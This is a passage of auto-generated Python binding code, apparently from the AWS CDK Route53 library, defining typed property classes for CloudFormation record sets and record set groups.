:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-aliastarget.html#cfn-route53-aliastarget-dnshostname
'''
result = self._values.get("dns_name")
assert result is not None, "Required property 'dns_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def hosted_zone_id(self) -> builtins.str:
'''``CfnRecordSet.AliasTargetProperty.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-aliastarget.html#cfn-route53-aliastarget-hostedzoneid
'''
result = self._values.get("hosted_zone_id")
assert result is not None, "Required property 'hosted_zone_id' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def evaluate_target_health(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnRecordSet.AliasTargetProperty.EvaluateTargetHealth``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-aliastarget.html#cfn-route53-aliastarget-evaluatetargethealth
'''
result = self._values.get("evaluate_target_health")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "AliasTargetProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnRecordSet.GeoLocationProperty",
jsii_struct_bases=[],
name_mapping={
"continent_code": "continentCode",
"country_code": "countryCode",
"subdivision_code": "subdivisionCode",
},
)
class GeoLocationProperty:
def __init__(
self,
*,
continent_code: typing.Optional[builtins.str] = None,
country_code: typing.Optional[builtins.str] = None,
subdivision_code: typing.Optional[builtins.str] = None,
) -> None:
'''
:param continent_code: ``CfnRecordSet.GeoLocationProperty.ContinentCode``.
:param country_code: ``CfnRecordSet.GeoLocationProperty.CountryCode``.
:param subdivision_code: ``CfnRecordSet.GeoLocationProperty.SubdivisionCode``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset-geolocation.html
'''
self._values: typing.Dict[str, typing.Any] = {}
if continent_code is not None:
self._values["continent_code"] = continent_code
if country_code is not None:
self._values["country_code"] = country_code
if subdivision_code is not None:
self._values["subdivision_code"] = subdivision_code
@builtins.property
def continent_code(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSet.GeoLocationProperty.ContinentCode``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset-geolocation.html#cfn-route53-recordset-geolocation-continentcode
'''
result = self._values.get("continent_code")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def country_code(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSet.GeoLocationProperty.CountryCode``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset-geolocation.html#cfn-route53-recordset-geolocation-countrycode
'''
result = self._values.get("country_code")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def subdivision_code(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSet.GeoLocationProperty.SubdivisionCode``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset-geolocation.html#cfn-route53-recordset-geolocation-subdivisioncode
'''
result = self._values.get("subdivision_code")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "GeoLocationProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.implements(aws_cdk.core.IInspectable)
class CfnRecordSetGroup(
aws_cdk.core.CfnResource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.CfnRecordSetGroup",
):
'''A CloudFormation ``AWS::Route53::RecordSetGroup``.
:cloudformationResource: AWS::Route53::RecordSetGroup
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html
'''
def __init__(
self,
scope: aws_cdk.core.Construct,
id: builtins.str,
*,
comment: typing.Optional[builtins.str] = None,
hosted_zone_id: typing.Optional[builtins.str] = None,
hosted_zone_name: typing.Optional[builtins.str] = None,
record_sets: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.Sequence[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.RecordSetProperty"]]]] = None,
) -> None:
'''Create a new ``AWS::Route53::RecordSetGroup``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param comment: ``AWS::Route53::RecordSetGroup.Comment``.
:param hosted_zone_id: ``AWS::Route53::RecordSetGroup.HostedZoneId``.
:param hosted_zone_name: ``AWS::Route53::RecordSetGroup.HostedZoneName``.
:param record_sets: ``AWS::Route53::RecordSetGroup.RecordSets``.
'''
props = CfnRecordSetGroupProps(
comment=comment,
hosted_zone_id=hosted_zone_id,
hosted_zone_name=hosted_zone_name,
record_sets=record_sets,
)
jsii.create(CfnRecordSetGroup, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
'''Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
'''
return typing.cast(None, jsii.invoke(self, "inspect", [inspector]))
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The CloudFormation resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "cfnProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="comment")
def comment(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSetGroup.Comment``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html#cfn-route53-recordsetgroup-comment
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "comment"))
@comment.setter
def comment(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "comment", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneId")
def hosted_zone_id(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSetGroup.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html#cfn-route53-recordsetgroup-hostedzoneid
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "hostedZoneId"))
@hosted_zone_id.setter
def hosted_zone_id(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "hostedZoneId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneName")
def hosted_zone_name(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSetGroup.HostedZoneName``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html#cfn-route53-recordsetgroup-hostedzonename
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "hostedZoneName"))
@hosted_zone_name.setter
def hosted_zone_name(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "hostedZoneName", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="recordSets")
def record_sets(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.RecordSetProperty"]]]]:
'''``AWS::Route53::RecordSetGroup.RecordSets``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html#cfn-route53-recordsetgroup-recordsets
'''
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.RecordSetProperty"]]]], jsii.get(self, "recordSets"))
@record_sets.setter
def record_sets(
self,
value: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.RecordSetProperty"]]]],
) -> None:
jsii.set(self, "recordSets", value)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnRecordSetGroup.AliasTargetProperty",
jsii_struct_bases=[],
name_mapping={
"dns_name": "dnsName",
"hosted_zone_id": "hostedZoneId",
"evaluate_target_health": "evaluateTargetHealth",
},
)
class AliasTargetProperty:
def __init__(
self,
*,
dns_name: builtins.str,
hosted_zone_id: builtins.str,
evaluate_target_health: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
) -> None:
'''
:param dns_name: ``CfnRecordSetGroup.AliasTargetProperty.DNSName``.
:param hosted_zone_id: ``CfnRecordSetGroup.AliasTargetProperty.HostedZoneId``.
:param evaluate_target_health: ``CfnRecordSetGroup.AliasTargetProperty.EvaluateTargetHealth``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-aliastarget.html
'''
self._values: typing.Dict[str, typing.Any] = {
"dns_name": dns_name,
"hosted_zone_id": hosted_zone_id,
}
if evaluate_target_health is not None:
self._values["evaluate_target_health"] = evaluate_target_health
@builtins.property
def dns_name(self) -> builtins.str:
'''``CfnRecordSetGroup.AliasTargetProperty.DNSName``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-aliastarget.html#cfn-route53-aliastarget-dnshostname
'''
result = self._values.get("dns_name")
assert result is not None, "Required property 'dns_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def hosted_zone_id(self) -> builtins.str:
'''``CfnRecordSetGroup.AliasTargetProperty.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-aliastarget.html#cfn-route53-aliastarget-hostedzoneid
'''
result = self._values.get("hosted_zone_id")
assert result is not None, "Required property 'hosted_zone_id' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def evaluate_target_health(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnRecordSetGroup.AliasTargetProperty.EvaluateTargetHealth``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-aliastarget.html#cfn-route53-aliastarget-evaluatetargethealth
'''
result = self._values.get("evaluate_target_health")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "AliasTargetProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnRecordSetGroup.GeoLocationProperty",
jsii_struct_bases=[],
name_mapping={
"continent_code": "continentCode",
"country_code": "countryCode",
"subdivision_code": "subdivisionCode",
},
)
class GeoLocationProperty:
def __init__(
self,
*,
continent_code: typing.Optional[builtins.str] = None,
country_code: typing.Optional[builtins.str] = None,
subdivision_code: typing.Optional[builtins.str] = None,
) -> None:
'''
:param continent_code: ``CfnRecordSetGroup.GeoLocationProperty.ContinentCode``.
:param country_code: ``CfnRecordSetGroup.GeoLocationProperty.CountryCode``.
:param subdivision_code: ``CfnRecordSetGroup.GeoLocationProperty.SubdivisionCode``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset-geolocation.html
'''
self._values: typing.Dict[str, typing.Any] = {}
if continent_code is not None:
self._values["continent_code"] = continent_code
if country_code is not None:
self._values["country_code"] = country_code
if subdivision_code is not None:
self._values["subdivision_code"] = subdivision_code
@builtins.property
def continent_code(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.GeoLocationProperty.ContinentCode``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset-geolocation.html#cfn-route53-recordsetgroup-geolocation-continentcode
'''
result = self._values.get("continent_code")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def country_code(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.GeoLocationProperty.CountryCode``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset-geolocation.html#cfn-route53-recordset-geolocation-countrycode
'''
result = self._values.get("country_code")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def subdivision_code(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.GeoLocationProperty.SubdivisionCode``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset-geolocation.html#cfn-route53-recordset-geolocation-subdivisioncode
'''
result = self._values.get("subdivision_code")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "GeoLocationProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnRecordSetGroup.RecordSetProperty",
jsii_struct_bases=[],
name_mapping={
"name": "name",
"type": "type",
"alias_target": "aliasTarget",
"comment": "comment",
"failover": "failover",
"geo_location": "geoLocation",
"health_check_id": "healthCheckId",
"hosted_zone_id": "hostedZoneId",
"hosted_zone_name": "hostedZoneName",
"multi_value_answer": "multiValueAnswer",
"region": "region",
"resource_records": "resourceRecords",
"set_identifier": "setIdentifier",
"ttl": "ttl",
"weight": "weight",
},
)
class RecordSetProperty:
def __init__(
self,
*,
name: builtins.str,
type: builtins.str,
alias_target: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.AliasTargetProperty"]] = None,
comment: typing.Optional[builtins.str] = None,
failover: typing.Optional[builtins.str] = None,
geo_location: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.GeoLocationProperty"]] = None,
health_check_id: typing.Optional[builtins.str] = None,
hosted_zone_id: typing.Optional[builtins.str] = None,
hosted_zone_name: typing.Optional[builtins.str] = None,
multi_value_answer: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
region: typing.Optional[builtins.str] = None,
resource_records: typing.Optional[typing.Sequence[builtins.str]] = None,
set_identifier: typing.Optional[builtins.str] = None,
ttl: typing.Optional[builtins.str] = None,
weight: typing.Optional[jsii.Number] = None,
) -> None:
'''
:param name: ``CfnRecordSetGroup.RecordSetProperty.Name``.
:param type: ``CfnRecordSetGroup.RecordSetProperty.Type``.
:param alias_target: ``CfnRecordSetGroup.RecordSetProperty.AliasTarget``.
:param comment: ``CfnRecordSetGroup.RecordSetProperty.Comment``.
:param failover: ``CfnRecordSetGroup.RecordSetProperty.Failover``.
:param geo_location: ``CfnRecordSetGroup.RecordSetProperty.GeoLocation``.
:param health_check_id: ``CfnRecordSetGroup.RecordSetProperty.HealthCheckId``.
:param hosted_zone_id: ``CfnRecordSetGroup.RecordSetProperty.HostedZoneId``.
:param hosted_zone_name: ``CfnRecordSetGroup.RecordSetProperty.HostedZoneName``.
:param multi_value_answer: ``CfnRecordSetGroup.RecordSetProperty.MultiValueAnswer``.
:param region: ``CfnRecordSetGroup.RecordSetProperty.Region``.
:param resource_records: ``CfnRecordSetGroup.RecordSetProperty.ResourceRecords``.
:param set_identifier: ``CfnRecordSetGroup.RecordSetProperty.SetIdentifier``.
:param ttl: ``CfnRecordSetGroup.RecordSetProperty.TTL``.
:param weight: ``CfnRecordSetGroup.RecordSetProperty.Weight``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html
'''
self._values: typing.Dict[str, typing.Any] = {
"name": name,
"type": type,
}
if alias_target is not None:
self._values["alias_target"] = alias_target
if comment is not None:
self._values["comment"] = comment
if failover is not None:
self._values["failover"] = failover
if geo_location is not None:
self._values["geo_location"] = geo_location
if health_check_id is not None:
self._values["health_check_id"] = health_check_id
if hosted_zone_id is not None:
self._values["hosted_zone_id"] = hosted_zone_id
if hosted_zone_name is not None:
self._values["hosted_zone_name"] = hosted_zone_name
if multi_value_answer is not None:
self._values["multi_value_answer"] = multi_value_answer
if region is not None:
self._values["region"] = region
if resource_records is not None:
self._values["resource_records"] = resource_records
if set_identifier is not None:
self._values["set_identifier"] = set_identifier
if ttl is not None:
self._values["ttl"] = ttl
if weight is not None:
self._values["weight"] = weight
@builtins.property
def name(self) -> builtins.str:
'''``CfnRecordSetGroup.RecordSetProperty.Name``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-name
'''
result = self._values.get("name")
assert result is not None, "Required property 'name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def type(self) -> builtins.str:
'''``CfnRecordSetGroup.RecordSetProperty.Type``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-type
'''
result = self._values.get("type")
assert result is not None, "Required property 'type' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def alias_target(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.AliasTargetProperty"]]:
'''``CfnRecordSetGroup.RecordSetProperty.AliasTarget``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-aliastarget
'''
result = self._values.get("alias_target")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.AliasTargetProperty"]], result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.RecordSetProperty.Comment``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def failover(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.RecordSetProperty.Failover``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-failover
'''
result = self._values.get("failover")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def geo_location(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.GeoLocationProperty"]]:
'''``CfnRecordSetGroup.RecordSetProperty.GeoLocation``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-geolocation
'''
result = self._values.get("geo_location")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.GeoLocationProperty"]], result)
@builtins.property
def health_check_id(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.RecordSetProperty.HealthCheckId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-healthcheckid
'''
result = self._values.get("health_check_id")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def hosted_zone_id(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.RecordSetProperty.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-hostedzoneid
'''
result = self._values.get("hosted_zone_id")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def hosted_zone_name(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.RecordSetProperty.HostedZoneName``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-hostedzonename
'''
result = self._values.get("hosted_zone_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def multi_value_answer(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnRecordSetGroup.RecordSetProperty.MultiValueAnswer``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-multivalueanswer
'''
result = self._values.get("multi_value_answer")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def region(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.RecordSetProperty.Region``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-region
'''
result = self._values.get("region")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def resource_records(self) -> typing.Optional[typing.List[builtins.str]]:
'''``CfnRecordSetGroup.RecordSetProperty.ResourceRecords``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-resourcerecords
'''
result = self._values.get("resource_records")
return typing.cast(typing.Optional[typing.List[builtins.str]], result)
@builtins.property
def set_identifier(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.RecordSetProperty.SetIdentifier``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-setidentifier
'''
result = self._values.get("set_identifier")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.RecordSetProperty.TTL``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-ttl
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def weight(self) -> typing.Optional[jsii.Number]:
'''``CfnRecordSetGroup.RecordSetProperty.Weight``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-weight
'''
result = self._values.get("weight")
return typing.cast(typing.Optional[jsii.Number], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "RecordSetProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnRecordSetGroupProps",
jsii_struct_bases=[],
name_mapping={
"comment": "comment",
"hosted_zone_id": "hostedZoneId",
"hosted_zone_name": "hostedZoneName",
"record_sets": "recordSets",
},
)
class CfnRecordSetGroupProps:
def __init__(
self,
*,
comment: typing.Optional[builtins.str] = None,
hosted_zone_id: typing.Optional[builtins.str] = None,
hosted_zone_name: typing.Optional[builtins.str] = None,
record_sets: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.Sequence[typing.Union[aws_cdk.core.IResolvable, CfnRecordSetGroup.RecordSetProperty]]]] = None,
) -> None:
'''Properties for defining a ``AWS::Route53::RecordSetGroup``.
:param comment: ``AWS::Route53::RecordSetGroup.Comment``.
:param hosted_zone_id: ``AWS::Route53::RecordSetGroup.HostedZoneId``.
:param hosted_zone_name: ``AWS::Route53::RecordSetGroup.HostedZoneName``.
:param record_sets: ``AWS::Route53::RecordSetGroup.RecordSets``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html
'''
self._values: typing.Dict[str, typing.Any] = {}
if comment is not None:
self._values["comment"] = comment
if hosted_zone_id is not None:
self._values["hosted_zone_id"] = hosted_zone_id
if hosted_zone_name is not None:
self._values["hosted_zone_name"] = hosted_zone_name
if record_sets is not None:
self._values["record_sets"] = record_sets
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSetGroup.Comment``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html#cfn-route53-recordsetgroup-comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def hosted_zone_id(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSetGroup.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html#cfn-route53-recordsetgroup-hostedzoneid
'''
result = self._values.get("hosted_zone_id")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def hosted_zone_name(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSetGroup.HostedZoneName``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html#cfn-route53-recordsetgroup-hostedzonename
'''
result = self._values.get("hosted_zone_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_sets(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, CfnRecordSetGroup.RecordSetProperty]]]]:
'''``AWS::Route53::RecordSetGroup.RecordSets``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html#cfn-route53-recordsetgroup-recordsets
'''
result = self._values.get("record_sets")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, CfnRecordSetGroup.RecordSetProperty]]]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CfnRecordSetGroupProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnRecordSetProps",
jsii_struct_bases=[],
name_mapping={
"name": "name",
"type": "type",
"alias_target": "aliasTarget",
"comment": "comment",
"failover": "failover",
"geo_location": "geoLocation",
"health_check_id": "healthCheckId",
"hosted_zone_id": "hostedZoneId",
"hosted_zone_name": "hostedZoneName",
"multi_value_answer": "multiValueAnswer",
"region": "region",
"resource_records": "resourceRecords",
"set_identifier": "setIdentifier",
"ttl": "ttl",
"weight": "weight",
},
)
class CfnRecordSetProps:
def __init__(
self,
*,
name: builtins.str,
type: builtins.str,
alias_target: typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnRecordSet.AliasTargetProperty]] = None,
comment: typing.Optional[builtins.str] = None,
failover: typing.Optional[builtins.str] = None,
geo_location: typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnRecordSet.GeoLocationProperty]] = None,
health_check_id: typing.Optional[builtins.str] = None,
hosted_zone_id: typing.Optional[builtins.str] = None,
hosted_zone_name: typing.Optional[builtins.str] = None,
multi_value_answer: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
region: typing.Optional[builtins.str] = None,
resource_records: typing.Optional[typing.Sequence[builtins.str]] = None,
set_identifier: typing.Optional[builtins.str] = None,
ttl: typing.Optional[builtins.str] = None,
weight: typing.Optional[jsii.Number] = None,
) -> None:
'''Properties for defining a ``AWS::Route53::RecordSet``.
:param name: ``AWS::Route53::RecordSet.Name``.
:param type: ``AWS::Route53::RecordSet.Type``.
:param alias_target: ``AWS::Route53::RecordSet.AliasTarget``.
:param comment: ``AWS::Route53::RecordSet.Comment``.
:param failover: ``AWS::Route53::RecordSet.Failover``.
:param geo_location: ``AWS::Route53::RecordSet.GeoLocation``.
:param health_check_id: ``AWS::Route53::RecordSet.HealthCheckId``.
:param hosted_zone_id: ``AWS::Route53::RecordSet.HostedZoneId``.
:param hosted_zone_name: ``AWS::Route53::RecordSet.HostedZoneName``.
:param multi_value_answer: ``AWS::Route53::RecordSet.MultiValueAnswer``.
:param region: ``AWS::Route53::RecordSet.Region``.
:param resource_records: ``AWS::Route53::RecordSet.ResourceRecords``.
:param set_identifier: ``AWS::Route53::RecordSet.SetIdentifier``.
:param ttl: ``AWS::Route53::RecordSet.TTL``.
:param weight: ``AWS::Route53::RecordSet.Weight``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html
'''
self._values: typing.Dict[str, typing.Any] = {
"name": name,
"type": type,
}
if alias_target is not None:
self._values["alias_target"] = alias_target
if comment is not None:
self._values["comment"] = comment
if failover is not None:
self._values["failover"] = failover
if geo_location is not None:
self._values["geo_location"] = geo_location
if health_check_id is not None:
self._values["health_check_id"] = health_check_id
if hosted_zone_id is not None:
self._values["hosted_zone_id"] = hosted_zone_id
if hosted_zone_name is not None:
self._values["hosted_zone_name"] = hosted_zone_name
if multi_value_answer is not None:
self._values["multi_value_answer"] = multi_value_answer
if region is not None:
self._values["region"] = region
if resource_records is not None:
self._values["resource_records"] = resource_records
if set_identifier is not None:
self._values["set_identifier"] = set_identifier
if ttl is not None:
self._values["ttl"] = ttl
